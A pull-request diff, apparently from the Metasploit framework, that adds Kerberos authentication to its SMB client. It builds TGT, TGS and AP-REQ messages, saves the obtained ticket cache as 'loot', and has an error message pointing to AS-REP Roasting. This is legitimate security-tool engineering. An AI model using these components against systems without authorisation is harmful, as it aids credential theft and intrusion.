### PR TITLE
Add initial smb kerberos authentication support

### DIFF
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -425,7 +425,7 @@ GEM
     ruby-progressbar (1.11.0)
     ruby-rc4 (0.1.5)
     ruby2_keywords (0.0.5)
-    ruby_smb (3.1.3)
+    ruby_smb (3.1.5)
       bindata
       openssl-ccm
       openssl-cmac
@@ -515,4 +515,4 @@ DEPENDENCIES
   yard
 
 BUNDLED WITH
-   2.1.4
+   2.2.22

--- a/lib/msf/core/exploit/remote/auth_option.rb
+++ b/lib/msf/core/exploit/remote/auth_option.rb
@@ -1,0 +1,59 @@
+# -*- coding: binary -*-
+
+module Msf::Exploit::Remote::AuthOption
+  # The module / specific protocol will automatically negotiate the best authentication method to use
+  AUTO = 'auto'
+
+  # NTLM authentication is used
+  NTLM = 'ntlm'
+
+  # Kerberos authentication is used
+  KERBEROS = 'kerberos'
+
+  # plaintext authentication is used
+  PLAINTEXT = 'plaintext'
+
+  # Do not authenticate with the service
+  NONE = 'none'
+
+  # The auth methods supported by the SMB protocol
+  SMB_OPTIONS = [
+    AUTO,
+    NTLM,
+    KERBEROS
+  ]
+
+  # The auth methods supported by the HTTP protocol
+  HTTP_OPTIONS = [
+    AUTO,
+    NTLM,
+    KERBEROS,
+    PLAINTEXT,
+    NONE
+  ]
+
+  # The auth methods supported by the LDAP protocol
+  LDAP_OPTIONS = [
+    AUTO,
+    NTLM,
+    KERBEROS,
+    PLAINTEXT,
+    NONE
+  ]
+
+  # The auth methods supported by the MSSQL/TDS protocol
+  MSSQL_OPTIONS = [
+    AUTO,
+    NTLM,
+    KERBEROS,
+    PLAINTEXT
+  ]
+
+  # The auth methods supported by the WINRM protocol
+  WINRM_OPTIONS = [
+    AUTO,
+    NTLM,
+    KERBEROS,
+    PLAINTEXT
+  ]
+end

--- a/lib/msf/core/exploit/remote/kerberos/client.rb
+++ b/lib/msf/core/exploit/remote/kerberos/client.rb
@@ -70,7 +70,7 @@ module Msf
               context:
                 {
                   'Msf'        => framework,
-                  'MsfExploit' => self,
+                  'MsfExploit' => framework_module,
                 },
               protocol: 'tcp'
             )
@@ -253,8 +253,17 @@ module Msf
             Msf::Exploit::Remote::Kerberos::Model::TgtResponse.new(
               as_rep: preauth_as_res,
               preauth_required: true,
-              decrypted_part: decrypt_kdc_as_rep_enc_part(preauth_as_res, password_digest),
+              decrypted_part: decrypt_kdc_as_rep_enc_part(
+                preauth_as_res,
+                password_digest,
+              )
             )
+          end
+
+          protected
+
+          def framework_module
+            self
           end
         end
       end

--- a/lib/msf/core/exploit/remote/kerberos/client/tgs_request.rb
+++ b/lib/msf/core/exploit/remote/kerberos/client/tgs_request.rb
@@ -26,7 +26,7 @@ module Msf
             # @see Rex::Proto::Kerberos::Model::PreAuthDataEntry
             # @see Rex::Proto::Kerberos::Model::KdcRequest
             def build_tgs_request(opts = {})
-              subkey = opts[:subkey] || build_subkey(opts)
+              subkey = opts.fetch(:subkey) { build_subkey(opts) }
 
               if opts[:enc_auth_data]
                 enc_auth_data = opts[:enc_auth_data]
@@ -39,26 +39,24 @@ module Msf
                 enc_auth_data = nil
               end
 
-              body = build_tgs_request_body(opts.merge(
-                enc_auth_data: enc_auth_data
-              ))
-
-              checksum = opts[:checksum] || build_tgs_body_checksum(:body => body)
-
-              if opts[:auhtenticator]
-                authenticator = opts[:authenticator]
-              else
-                authenticator = build_authenticator(opts.merge(
-                  subkey: subkey,
-                  checksum: checksum
+              body = opts.fetch(:body) do
+                build_tgs_request_body(opts.merge(
+                  enc_auth_data: enc_auth_data
                 ))
               end
 
-              if opts[:ap_req]
-                ap_req = opts[:ap_req]
-              else
-                ap_req = build_ap_req(opts.merge(:authenticator => authenticator))
+              checksum = opts.fetch(:checksum) { build_tgs_body_checksum(:body => body) }
+
+              authenticator = opts.fetch(:authenticator) do
+                build_authenticator(opts.merge(
+                  subkey: subkey,
+                  checksum: checksum,
+                  body: body,
+                  authenticator_enc_key_usage: Rex::Proto::Kerberos::Crypto::KeyUsage::TGS_REQ_PA_TGS_REQ_AP_REQ_AUTHENTICATOR
+                ))
               end
+
+              ap_req = opts.fetch(:ap_req) { build_ap_req(opts.merge(:authenticator => authenticator)) }
 
               pa_ap_req = Rex::Proto::Kerberos::Model::PreAuthDataEntry.new(
                 type: Rex::Proto::Kerberos::Model::PreAuthType::PA_TGS_REQ,
@@ -125,12 +123,16 @@ module Msf
             # @see Rex::Proto::Kerberos::Model::EncryptedData
             # @see Rex::Proto::Kerberos::Model::EncryptionKey
             def build_ap_req(opts = {})
-              pvno = opts[:pvno] || Rex::Proto::Kerberos::Model::VERSION
-              msg_type = opts[:msg_type] || Rex::Proto::Kerberos::Model::AP_REQ
-              options = opts[:ap_req_options] || 0
+              pvno = opts.fetch(:pvno) { Rex::Proto::Kerberos::Model::VERSION }
+              msg_type = opts.fetch(:msg_type) { Rex::Proto::Kerberos::Model::AP_REQ }
+              options = opts.fetch(:ap_req_options) { 0 }
               ticket = opts[:ticket]
-              authenticator = opts[:authenticator] || build_authenticator(opts)
-              session_key = opts[:session_key] || build_subkey(opts)
+              authenticator = opts.fetch(:authenticator) do
+                build_authenticator(opts.merge(
+                  authenticator_enc_key_usage: Rex::Proto::Kerberos::Crypto::KeyUsage::AP_REQ_AUTHENTICATOR
+                ))
+              end
+              session_key = opts.fetch(:session_key) { build_subkey(opts) }
 
               if ticket.nil?
                 raise ::Rex::Proto::Kerberos::Model::Error::KerberosError, 'Building a AP-REQ without ticket not supported'
@@ -167,12 +169,15 @@ module Msf
             # @see Rex::Proto::Kerberos::Model::EncryptionKey
             # @see Rex::Proto::Kerberos::Model::Authenticator
             def build_authenticator(opts = {})
-              cname = opts[:cname] || build_client_name(opts)
+              cname = opts.fetch(:cname) { build_client_name(opts) }
               realm = opts[:realm] || ''
-              ctime = opts[:ctime] || Time.now
-              cusec = opts[:cusec] || ctime.usec
-              checksum = opts[:checksum] || build_tgs_body_checksum(opts)
-              subkey = opts[:subkey] || build_subkey(opts)
+              ctime = opts[:ctime] || Time.now.utc
+              cusec = opts[:cusec] || ctime&.usec || 0
+              checksum = opts.fetch(:checksum) { build_tgs_body_checksum(opts) }
+              subkey = opts.fetch(:subkey) { build_subkey(opts) }
+              authenticator_enc_key_usage = opts.fetch(:authenticator_enc_key_usage) do
+                Rex::Proto::Kerberos::Crypto::KeyUsage::TGS_REQ_PA_TGS_REQ_AP_REQ_AUTHENTICATOR
+              end
 
               authenticator = Rex::Proto::Kerberos::Model::Authenticator.new(
                 vno: 5,
@@ -181,7 +186,8 @@ module Msf
                 checksum: checksum,
                 cusec: cusec,
                 ctime: ctime,
-                subkey: subkey
+                subkey: subkey,
+                enc_key_usage: authenticator_enc_key_usage
               )
 
               authenticator
@@ -206,7 +212,6 @@ module Msf
               subkey
             end
 
-
             # Builds a kerberos TGS request body
             #
             # @param opts [Hash{Symbol => <Integer, Time, String, Rex::Proto::Kerberos::Model::PrincipalName, Rex::Proto::Kerberos::Model::EncryptedData>}]
@@ -224,15 +229,15 @@ module Msf
             # @see Rex::Proto::Kerberos::Model::PrincipalName
             # @see Rex::Proto::Kerberos::Model::KdcRequestBody
             def build_tgs_request_body(opts = {})
-              options = opts[:options] || 0x50800000 # Forwardable, Proxiable, Renewable
-              from = opts[:from] || Time.at(0)
-              till = opts[:till] || Time.at(0)
-              rtime = opts[:rtime] || Time.at(0)
-              nonce = opts[:nonce] || Rex::Text.rand_text_numeric(6).to_i
-              etype = opts[:etype] || Rex::Proto::Kerberos::Crypto::Encryption::DefaultOfferedEtypes
-              cname = opts[:cname] || build_client_name(opts)
-              realm = opts[:realm] || ''
-              sname = opts[:sname] || build_server_name(opts)
+              options = opts.fetch(:options) { 0x50800000 } # Forwardable, Proxiable, Renewable
+              from = opts.fetch(:from) { Time.at(0).utc }
+              till = opts.fetch(:till) { Time.at(0).utc }
+              rtime = opts.fetch(:rtime) { Time.at(0).utc }
+              nonce = opts.fetch(:nonce) { Rex::Text.rand_text_numeric(6).to_i }
+              etype = opts.fetch(:etype) { [Rex::Proto::Kerberos::Crypto::Encryption::DefaultEncryptionType] }
+              cname = opts.fetch(:cname) { build_client_name(opts) }
+              realm = opts.fetch(:realm) { '' }
+              sname = opts.fetch(:sname) { build_server_name(opts) }
               enc_auth_data = opts[:enc_auth_data] || nil
 
               body = Rex::Proto::Kerberos::Model::KdcRequestBody.new(
@@ -259,7 +264,7 @@ module Msf
             # @see #build_tgs_request_body
             # @see Rex::Proto::Kerberos::Model::Checksum
             def build_tgs_body_checksum(opts = {})
-              body = opts[:body] || build_tgs_request_body(opts)
+              body = opts.fetch(:body) { build_tgs_request_body(opts) }
               checksum_type = Rex::Proto::Kerberos::Crypto::Checksum::RSA_MD5
               key = nil
 

--- a/lib/msf/core/exploit/remote/kerberos/client/tgs_response.rb
+++ b/lib/msf/core/exploit/remote/kerberos/client/tgs_response.rb
@@ -7,6 +7,22 @@ module Msf
         module Client
           # Methods for processing TGS responses.
           module TgsResponse
+
+            # Extracts the Kerberos credentials, building a MIT Cache Credential,
+            # from a Kerberos TGS response.
+            #
+            # @param res [Rex::Proto::Kerberos::Model::KdcResponse]
+            # @param key [String]
+            # @param msg_type [Rex::Proto::Kerberos::Crypto::KeyUsage]
+            # @return [Rex::Proto::Kerberos::CredentialCache::Cache]
+            # @see Rex::Proto::Kerberos::Model::EncKdcResponse
+            # @see Rex::Proto::Kerberos::Model::EncKdcResponse.decode
+            # @see Rex::Proto::Kerberos::CredentialCache::Krb5Ccache
+            def decrypt_kdc_tgs_rep_enc_part(res, key, msg_type:)
+              decrypt_res = res.enc_part.decrypt_asn1(key, msg_type)
+              Rex::Proto::Kerberos::Model::EncKdcResponse.decode(decrypt_res)
+            end
+
             # Extracts the Kerberos credentials, building a MIT Cache Credential,
             # from a Kerberos TGS response.
             #
@@ -16,10 +32,9 @@ module Msf
             # @see Rex::Proto::Kerberos::Model::EncKdcResponse
             # @see Rex::Proto::Kerberos::Model::EncKdcResponse.decode
             # @see Msf::Kerberos::Client::CacheCredential
-            # @see Rex::Proto::Kerberos::CredentialCache::Krb5Ccache
-            def extract_kerb_creds(res, key)
-              decrypt_res = res.enc_part.decrypt_asn1(key, Rex::Proto::Kerberos::Crypto::KeyUsage::TGS_REP_ENCPART_AUTHENTICATOR_SUB_KEY)
-              enc_res = Rex::Proto::Kerberos::Model::EncKdcResponse.decode(decrypt_res)
+            # @see Rex::Proto::Kerberos::CredentialCache::Cache
+            def extract_kerb_creds(res, key, msg_type: Rex::Proto::Kerberos::Crypto::KeyUsage::TGS_REP_ENCPART_AUTHENTICATOR_SUB_KEY)
+              enc_res = decrypt_kdc_tgs_rep_enc_part(res, key, msg_type: msg_type)
 
               cache = Rex::Proto::Kerberos::CredentialCache::Krb5Ccache.new(
                 default_principal: {

--- a/lib/msf/core/exploit/remote/kerberos/service_authenticator/base.rb
+++ b/lib/msf/core/exploit/remote/kerberos/service_authenticator/base.rb
@@ -1,0 +1,275 @@
+# -*- coding: binary -*-
+
+#
+# This class acts as standalone authenticator for Kerberos
+#
+class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
+  extend Forwardable
+  include Msf::Exploit::Remote::Kerberos::Client
+  include Msf::Auxiliary::Report
+
+  # https://datatracker.ietf.org/doc/html/rfc4121#section-4.1
+  TOK_ID_KRB_AP_REQ = "\x01\x00"
+  TOK_ID_KRB_AP_REP = "\x02\x00"
+  TOK_ID_KRB_ERROR  = "\x03\x00"
+
+  # https://datatracker.ietf.org/doc/html/rfc4178#section-4.2.2
+  NEG_TOKEN_ACCEPT_COMPLETED      = 0
+  NEG_TOKEN_ACCEPT_INCOMPLETE     = 1
+  NEG_TOKEN_REJECT                = 2
+  NEG_TOKEN_REQUEST_MIC           = 3
+
+  # @!attribute [r] realm
+  #   @return [String] the realm to use
+  attr_reader :realm
+
+  # @!attribute [r] username
+  #   @return [String] the username to use
+  attr_reader :username
+
+  # @!attribute [r] password
+  #   @return [String] the password to use
+  attr_reader :password
+
+  # @!attribute [r] hostname
+  #   @return [String] the unresolved name of the host that the ticket will be used against
+  attr_reader :hostname
+
+  # @!attribute [r] host
+  #   @return [String] the kerberos host to request a ticket from
+  attr_reader :host
+
+  # @!attribute [r] host
+  #   @return [Integer] the kerberos port to request a ticket from
+  attr_reader :port
+
+  # @!attribute [r] timeout
+  #   @return [Integer] the kerberos timeout
+  attr_reader :timeout
+
+  # @!attribute [r] framework
+  #   @return [Msf::Framework] the Metasploit framework instance
+  attr_reader :framework
+
+  # @!attribute [r] framework
+  #   @return [Msf::Module] the Metasploit framework module that is associated with the authentication instance
+  attr_reader :framework_module
+
+  def_delegators :@framework_module,
+                :print_status,
+                :print_good,
+                :workspace
+
+  def initialize(
+      realm: nil,
+      hostname: nil,
+      username: nil,
+      password: nil,
+      host: nil,
+      port: 88,
+      timeout: 25,
+      framework: nil,
+      framework_module: nil
+  )
+    @realm = realm
+    @hostname = hostname
+    @host = host
+    @port = port
+    @timeout = timeout
+    @username = username
+    @password = password
+    @framework = framework
+    @framework_module = framework_module
+  end
+
+  # Returns the target host
+  #
+  # @return [String]
+  def rhost
+    host
+  end
+
+  # Returns the remote port
+  #
+  # @return [Integer]
+  def rport
+    port
+  end
+
+  # @param [Hash] options
+  # @return [Hash] The security_blob SPNEGO GSS and TGS session key
+  def authenticate(options = {})
+    realm = self.realm.upcase
+    sname = options.fetch(:sname)
+
+    server_name = "krbtgt/#{realm}"
+    client_name = username
+
+    tgt_result = send_request_tgt(
+      server_name: server_name,
+      client_name: client_name,
+      password: password,
+      realm: realm,
+    )
+
+    if !tgt_result.preauth_required
+      raise ::Rex::Proto::Kerberos::Model::Error::KerberosError.new(
+        'Kerberos ticket does not require preauthentication. It is not possible to decrypt the encrypted message to request further TGS tickets. Try cracking the password via AS-REP Roasting techniques.',
+      )
+    end
+
+    print_status("#{peer} - Received a valid TGT-Response")
+
+    now = Time.now.utc
+    expiry_time = now + 1.day
+
+    options = Rex::Proto::Kerberos::Model::KdcOptionFlags.from_flags(
+      [
+        Rex::Proto::Kerberos::Model::KdcOptionFlag::FORWARDABLE,
+        Rex::Proto::Kerberos::Model::KdcOptionFlag::RENEWABLE,
+        Rex::Proto::Kerberos::Model::KdcOptionFlag::CANONICALIZE,
+        Rex::Proto::Kerberos::Model::KdcOptionFlag::RENEWABLE_OK,
+      ]
+    )
+
+    # TODO: From [MS-KILE]:
+    #     The subkey in the EncAPRepPart of the KRB_AP_REP message (defined in [RFC4120] section 5.5.2) is used as the
+    #     session key when MutualAuthentication is requested. When DES and RC4 are used, the implementation is as defined
+    #     in [RFC1964]. With DES and RC4, the subkey in the KRB_AP_REQ message can be used as the session key, as it is
+    #     the same as the subkey in KRB_AP_REP message. However, when AES is used (see [RFC4121]), the subkeys are different
+    #     and the subkey in the KRB_AP_REP message is used. (The KRB_AP_REQ message is defined in [RFC4120] section 5.5.1).
+    #   So for now, we set the subkey to nil
+    subkey = nil
+
+    tgs_res = send_request_tgs(
+      req: build_tgs_request(
+        {
+          session_key: tgt_result.decrypted_part.key,
+          subkey: subkey,
+          checksum: nil,
+          ticket: tgt_result.ticket,
+          realm: realm,
+          client_name: client_name,
+          options: options,
+
+          body: build_tgs_request_body(
+            cname: nil,
+            sname: sname,
+            realm: realm,
+            options: options,
+
+            # Specify nil to ensure the KDC uses the current time for the desired starttime of the requested ticket
+            from: nil,
+            till: expiry_time,
+            rtime: nil,
+
+            # certificate time
+            ctime: now,
+          )
+        }
+      )
+    )
+
+    # Verify error codes
+    if tgs_res.msg_type == Rex::Proto::Kerberos::Model::KRB_ERROR
+      raise ::Rex::Proto::Kerberos::Model::Error::KerberosError.new(res: tgs_res)
+    end
+
+    print_good("#{peer} - Received a valid TGS-Response")
+    cache = extract_kerb_creds(
+      tgs_res,
+      tgt_result.decrypted_part.key.value,
+      msg_type: Rex::Proto::Kerberos::Crypto::KeyUsage::TGS_REP_ENCPART_SESSION_KEY
+    )
+    path = store_loot('mit.kerberos.ccache', 'application/octet-stream', rhost, cache.encode)
+    print_status("#{peer} - TGS MIT Credential Cache saved to #{path}")
+
+    tgs_ticket = tgs_res.ticket
+    tgs_auth = decrypt_kdc_tgs_rep_enc_part(
+      tgs_res,
+      tgt_result.decrypted_part.key.value,
+      msg_type: Rex::Proto::Kerberos::Crypto::KeyUsage::TGS_REP_ENCPART_SESSION_KEY
+    )
+
+    ## Service Authentication
+
+    service_ap_request = build_service_ap_request(
+      session_key: tgs_auth.key,
+      subkey: subkey,
+      checksum: nil,
+      ticket: tgs_ticket,
+      realm: realm,
+      client_name: client_name,
+      options: options,
+    )
+
+    ap_request_asn1 = service_ap_request.to_asn1
+
+    {
+      security_blob: encode_gss_ap_request(ap_request_asn1),
+      session_key: tgs_auth.key
+    }
+  end
+
+  def build_service_ap_request(opts = {})
+    authenticator = opts.fetch(:authenticator) do
+      build_authenticator(opts.merge(
+        subkey: nil,
+        checksum: nil,
+        authenticator_enc_key_usage: Rex::Proto::Kerberos::Crypto::KeyUsage::AP_REQ_AUTHENTICATOR
+      ))
+    end
+
+    ap_req = opts.fetch(:ap_req) do
+      build_ap_req(opts.merge(:authenticator => authenticator))
+    end
+
+    ap_req
+  end
+
+  # @param [string] security_buffer SPNEGO GSS Blob
+  # @raise [Rex::Proto::Kerberos::Model::Error::KerberosDecodingError] if the response was not successful
+  def validate_response!(security_blob)
+    gss_api = OpenSSL::ASN1.decode(security_blob)
+    neg_result = ::RubySMB::Gss.asn1dig(gss_api, 0, 0, 0)&.value.to_i
+    supported_neg = ::RubySMB::Gss.asn1dig(gss_api, 0, 1, 0)&.value
+
+    is_success = neg_result == NEG_TOKEN_ACCEPT_COMPLETED &&
+      supported_neg == ::Rex::Proto::Gss::OID_MICROSOFT_KERBEROS_5.value
+
+    raise ::Rex::Proto::Kerberos::Model::Error::KerberosError.new('Failed to negotiate Kerberos GSS') unless is_success
+
+    is_success
+  end
+
+  # @param [Object] encoded_ap_req The ASN1 KRB_AP_REQ as defined in https://datatracker.ietf.org/doc/html/rfc1964#section-1.1.1
+  # @return [String] SPNEGO GSS Blob
+  def encode_gss_ap_request(ap_request_asn1)
+    ap_request_mech = OpenSSL::ASN1::ASN1Data.new(
+      [
+        ::Rex::Proto::Gss::OID_KERBEROS_5,
+        # a 2-byte TOK_ID field containing 01 00 for KRB_AP_REQ messages
+        TOK_ID_KRB_AP_REQ,
+        ap_request_asn1
+      ],
+      0,
+      :APPLICATION
+    ).to_der
+
+    OpenSSL::ASN1::ASN1Data.new([
+      ::Rex::Proto::Gss::OID_SPNEGO,
+      OpenSSL::ASN1::ASN1Data.new([
+        OpenSSL::ASN1::Sequence.new([
+          OpenSSL::ASN1::ASN1Data.new([
+            OpenSSL::ASN1::Sequence.new([
+              ::Rex::Proto::Gss::OID_MICROSOFT_KERBEROS_5
+            ])
+          ], 0, :CONTEXT_SPECIFIC),
+          OpenSSL::ASN1::ASN1Data.new([
+            OpenSSL::ASN1::OctetString.new(ap_request_mech)
+          ], 2, :CONTEXT_SPECIFIC)
+        ])
+      ], 0, :CONTEXT_SPECIFIC)
+    ], 0, :APPLICATION).to_der
+  end
+end

--- a/lib/msf/core/exploit/remote/kerberos/service_authenticator/smb.rb
+++ b/lib/msf/core/exploit/remote/kerberos/service_authenticator/smb.rb
@@ -1,0 +1,22 @@
+# -*- coding: binary -*-
+
+#
+# This class acts as standalone authenticator for Kerberos
+#
+class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::SMB < Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
+  # @param [Hash] options
+  # @return [String] SPNEGO GSS Blob
+  def authenticate(options = {})
+    sname = options.fetch(:sname) do
+      Rex::Proto::Kerberos::Model::PrincipalName.new(
+        name_type: Rex::Proto::Kerberos::Model::NameType::NT_SRV_INST,
+        name_string: [
+          "cifs",
+          options.fetch(:hostname) { hostname }
+        ]
+      )
+    end
+
+    super(options.merge({ sname: sname }))
+  end
+end

--- a/lib/msf/core/exploit/remote/smb/client.rb
+++ b/lib/msf/core/exploit/remote/smb/client.rb
@@ -151,13 +151,14 @@ module Msf
       def smb_login(simple_client = self.simple)
         # Override the default RubySMB capabilities with Kerberos authentication
         if datastore['SMBAuth'] == Msf::Exploit::Remote::AuthOption::KERBEROS
+          fail_with(Msf::Exploit::Failure::BadConfig, 'The SmbRhostname option is required when using kerberos authentication.') if datastore['SmbRhostname'].blank?
+
           kerberos_authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::SMB.new(
             host: datastore['DomainControllerRhost'],
             hostname: datastore['SmbRhostname'],
             realm: datastore['SMBDomain'],
             username: datastore['SMBUser'],
             password: datastore['SMBPass'],
-            timeout: datastore['timeout'],
             framework: framework,
             framework_module: self
           )

--- a/lib/msf/core/exploit/remote/smb/client.rb
+++ b/lib/msf/core/exploit/remote/smb/client.rb
@@ -149,6 +149,23 @@ module Msf
       # @param simple_client [Rex::Proto::SMB::SimpleClient] Optional SimpleClient instance to use
       # @return [void]
       def smb_login(simple_client = self.simple)
+        # Override the default RubySMB capabilities with Kerberos authentication
+        if datastore['SMBAuth'] == Msf::Exploit::Remote::AuthOption::KERBEROS
+          kerberos_authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::SMB.new(
+            host: datastore['DomainControllerRhost'],
+            hostname: datastore['SmbRhostname'],
+            realm: datastore['SMBDomain'],
+            username: datastore['SMBUser'],
+            password: datastore['SMBPass'],
+            timeout: datastore['timeout'],
+            framework: framework,
+            framework_module: self
+          )
+
+          simple_client.client.extend(Msf::Exploit::Remote::SMB::Client::KerberosAuthentication)
+          simple_client.client.kerberos_authenticator = kerberos_authenticator
+        end
+
         simple_client.login(
           datastore['SMBName'],
           datastore['SMBUser'],

--- a/lib/msf/core/exploit/remote/smb/client/authenticated.rb
+++ b/lib/msf/core/exploit/remote/smb/client/authenticated.rb
@@ -16,6 +16,15 @@ module Exploit::Remote::SMB::Client::Authenticated
         OptString.new('SMBPass', [ false, 'The password for the specified username', '']),
         OptString.new('SMBDomain',  [ false, 'The Windows domain to use for authentication', '.']),
       ], Msf::Exploit::Remote::SMB::Client::Authenticated)
+
+    register_advanced_options(
+      [
+        OptEnum.new('SMBAuth', [true, 'The Authentication mechanism to use', Msf::Exploit::Remote::AuthOption::AUTO, Msf::Exploit::Remote::AuthOption::SMB_OPTIONS]),
+        OptString.new('SmbRhostname', [false, 'The rhostname which is required for kerberos']),
+        OptAddress.new('DomainControllerRhost', [false, 'The resolvable rhost for the Domain Controller'])
+      ],
+      Msf::Exploit::Remote::SMB::Client::Authenticated
+    )
   end
 end
 

--- a/lib/msf/core/exploit/remote/smb/client/kerberos_authentication.rb
+++ b/lib/msf/core/exploit/remote/smb/client/kerberos_authentication.rb
@@ -1,0 +1,155 @@
+# -*- coding: binary -*-
+
+#
+# This class implements an override for RubySMB's default authentication method to instead
+# use a kerberos authenticator
+#
+module Msf::Exploit::Remote::SMB::Client::KerberosAuthentication
+  # @param [Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::SMB] kerberos_authenticator The authenticator to make the required Kerberos requests
+  def kerberos_authenticator=(kerberos_authenticator)
+    @kerberos_authenticator = kerberos_authenticator
+  end
+
+  def authenticate
+    raise ::RubySMB::Error::AuthenticationFailure, "Missing negotiation security buffer" if negotiation_security_buffer.nil?
+
+    gss_api = OpenSSL::ASN1.decode(negotiation_security_buffer)
+    mech_types = RubySMB::Gss.asn1dig(gss_api, 1, 0, 0, 0)&.value || []
+    has_kerberos_gss_mech_type = mech_types&.any? { |mech_type| mech_type.value == ::Rex::Proto::Gss::OID_MICROSOFT_KERBEROS_5.value }
+
+    error = "Unable to negotiate kerberos with the remote host. Expected oid #{::Rex::Proto::Gss::OID_MICROSOFT_KERBEROS_5.value} in #{mech_types.map(&:value).inspect}"
+    raise ::RubySMB::Error::AuthenticationFailure, error unless has_kerberos_gss_mech_type
+
+    if smb1
+      smb1_authenticate
+    else
+      smb2_authenticate
+    end
+  end
+
+  #
+  # SMB1 Methods
+  #
+
+  # Handles SMB1 Kerberos Authentication by delegating to a kerberos_authenticator implementation
+  # to generate a GSS security blob with an embedded AP_REQ. On success information is stored
+  # about the peer/server.
+  def smb1_authenticate
+    raise ::RubySMB::Error::AuthenticationFailure, 'Missing kerberos authenticator' unless @kerberos_authenticator
+
+    kerberos_result = @kerberos_authenticator.authenticate
+
+    @session_key = kerberos_result[:session_key].value[0..16]
+
+    raw_kerberos_response = smb1_kerberos_authenticate(kerberos_result[:security_blob])
+    response = smb1_session_setup_response(raw_kerberos_response)
+    @kerberos_authenticator.validate_response!(response.data_block.security_blob)
+
+    response_code = response.status_code
+
+    # Store the available OS information before going forward.
+    @peer_native_os = response.data_block.native_os.to_s
+    @peer_native_lm = response.data_block.native_lan_man.to_s
+
+    @user_id = response.smb_header.uid if response_code == WindowsError::NTStatus::STATUS_SUCCESS
+
+    response_code
+  end
+
+  #
+  # @param type3_message [String] the NTLM Type 3 message
+  # @param user_id [Integer] the temporary user ID from the Type 2 response
+  # @return [String] the raw binary response from the server
+  def smb1_kerberos_authenticate(security_buffer)
+    packet = smb1_kerberos_authenticate_packet(security_buffer)
+    send_recv(packet)
+  end
+
+  # Generates the {RubySMB::SMB1::Packet::SessionSetupRequest} packet
+  # with the NTLM Type 3 (Auth) message in the security_blob field.
+  #
+  # @param type3_message [String] the NTLM Type 3 message
+  # @param user_id [Integer] the temporary user ID from the Type 2 response
+  # @return [RubySMB::SMB1::Packet::SessionSetupRequest] the second authentication packet to send
+  def smb1_kerberos_authenticate_packet(security_blob)
+    packet = RubySMB::SMB1::Packet::SessionSetupRequest.new
+    # packet.smb_header.uid = user_id
+    packet.set_security_buffer(security_blob)
+    packet.parameter_block.max_buffer_size = self.max_buffer_size
+    packet.parameter_block.max_mpx_count = 50
+    packet.smb_header.flags2.extended_security = 1
+    packet
+  end
+
+  #
+  # SMB 2 Methods
+  #
+
+  # Handles SMB2 Kerberos Authentication by delegating to a kerberos_authenticator implementation
+  # to generate a GSS security blob with an embedded AP_REQ. On success information is stored
+  # about the peer/server.
+  def smb2_authenticate
+    raise ::RubySMB::Error::AuthenticationFailure, 'Missing kerberos authenticator' unless @kerberos_authenticator
+
+    kerberos_result = @kerberos_authenticator.authenticate
+
+    raw_kerberos_response = smb2_kerberos_authenticate(kerberos_result[:security_blob])
+    response = smb2_session_setup_response(raw_kerberos_response)
+    @kerberos_authenticator.validate_response!(response.buffer)
+
+    @session_id = response.smb2_header.session_id
+    @session_key = kerberos_result[:session_key].value[0..16]
+
+    @session_is_guest = response.session_flags.guest == 1
+
+    if @smb3
+      if response.session_flags.encrypt_data == 1
+        # if the server indicates that encryption is required, enable it
+        @session_encrypt_data = true
+      elsif (@session_is_guest && password != '') || (username == '' && password == '')
+        # disable encryption when necessary
+        @session_encrypt_data = false
+      end
+
+      # see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/7fd079ca-17e6-4f02-8449-46b606ea289c
+      if @dialect == '0x0300' || @dialect == '0x0302'
+        @application_key = RubySMB::Crypto::KDF.counter_mode(
+          @session_key,
+          "SMB2APP\x00",
+          "SmbRpc\x00"
+        )
+      else
+        @application_key = RubySMB::Crypto::KDF.counter_mode(
+          @session_key,
+          "SMBAppKey\x00",
+          @preauth_integrity_hash_value
+        )
+      end
+      # otherwise, leave encryption to the default value that it was initialized to
+    end
+    ######
+    # DEBUG
+    #puts "Session ID = #{@session_id.to_binary_s.each_byte.map {|e| '%02x' % e}.join}"
+    #puts "Session key = #{@session_key.each_byte.map {|e| '%02x' % e}.join}"
+    #puts "PreAuthHash = #{@preauth_integrity_hash_value.each_byte.map {|e| '%02x' % e}.join}" if @preauth_integrity_hash_value
+    ######
+
+    response.status_code
+  end
+
+  def smb2_kerberos_authenticate_packet(security_blob)
+    packet = RubySMB::SMB2::Packet::SessionSetupRequest.new
+    packet.set_security_buffer(security_blob)
+    packet.security_mode.signing_enabled = 1
+    packet
+  end
+
+  def smb2_kerberos_authenticate(security_blob)
+    packet = smb2_kerberos_authenticate_packet(security_blob)
+    response = send_recv(packet)
+    if @dialect == '0x0311'
+      update_preauth_hash(packet)
+    end
+    response
+  end
+end

--- a/lib/msf/core/exploit/remote/smb/client/kerberos_authentication.rb
+++ b/lib/msf/core/exploit/remote/smb/client/kerberos_authentication.rb
@@ -39,7 +39,7 @@ module Msf::Exploit::Remote::SMB::Client::KerberosAuthentication
 
     kerberos_result = @kerberos_authenticator.authenticate
 
-    @session_key = kerberos_result[:session_key].value[0..16]
+    @application_key = @session_key = kerberos_result[:session_key].value[0..16]
 
     raw_kerberos_response = smb1_kerberos_authenticate(kerberos_result[:security_blob])
     response = smb1_session_setup_response(raw_kerberos_response)
@@ -98,7 +98,7 @@ module Msf::Exploit::Remote::SMB::Client::KerberosAuthentication
     @kerberos_authenticator.validate_response!(response.buffer)
 
     @session_id = response.smb2_header.session_id
-    @session_key = kerberos_result[:session_key].value[0..16]
+    @application_key = @session_key = kerberos_result[:session_key].value[0..16]
 
     @session_is_guest = response.session_flags.guest == 1
 

--- a/lib/msf/core/rhosts_walker.rb
+++ b/lib/msf/core/rhosts_walker.rb
@@ -328,14 +328,14 @@ module Msf
 
     def set_hostname(datastore, result, hostname)
       hostname = Rex::Socket.is_ip_addr?(hostname) ? nil : hostname
-      result['RHOSTNAME'] = hostname if result['RHOSTNAME'].blank?
+      result['RHOSTNAME'] = hostname if datastore['RHOSTNAME'].blank?
       result['VHOST'] = hostname if datastore.options.include?('VHOST') && datastore['VHOST'].blank?
     end
 
     def set_username(datastore, result, username)
       # Preference setting application specific values first
       username_set = false
-      option_names = %w[SMBUser FtpUser Username user USERNAME username]
